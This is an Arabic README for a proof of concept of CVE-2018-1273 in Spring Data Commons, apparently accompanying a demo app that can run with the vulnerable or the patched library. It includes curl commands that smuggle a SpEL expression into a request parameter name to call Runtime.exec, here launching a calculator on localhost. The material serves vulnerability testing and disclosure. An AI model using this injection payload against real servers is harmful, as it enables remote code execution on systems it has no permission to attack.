
POC لـ CVE-2018-1273
Spring Data Commons، الإصدارات السابقة للنسخ 1.13 حتى 1.13.10، و2.0 حتى 2.0.5، والإصدارات الأقدم غير المدعومة، تحتوي على ثغرة في ربط الخصائص ناتجة عن معالجة غير صحيحة للعناصر الخاصة. يمكن لمستخدم ضار بعيد غير مصادق (أو مهاجم) إرسال معاملات طلبات مصممة خصيصًا ضد موارد HTTP المدعومة من Spring Data REST أو استخدام ربط حمولة الطلب المستند إلى الإسقاط في Spring Data، مما قد يؤدي إلى هجوم تنفيذ تعليمات برمجية عن بُعد.
مزيد من المعلومات هنا
يمكن اختبار التطبيق باستخدام الإصدار الضعيف أو الإصدار المُصحح من Spring Data Commons.
mvn spring-boot:run
mvn spring-boot:run -Dfixed
قم بتشغيل الأمر التالي للتحقق مما إذا كان يمكن استغلال الثغرة:
curl -X POST http://localhost:8080/account -d "name[#this.getClass().forName('java.lang.Runtime').getRuntime().exec('calc.exe')]=123"
curl -X POST http://localhost:8080/account -d "name[#this.getClass().forName('java.lang.Runtime').getRuntime().exec('/Applications/Calculator.app/Contents/MacOS/Calculator')]=test"
أُنشئ بواسطة https://www.arima.eu
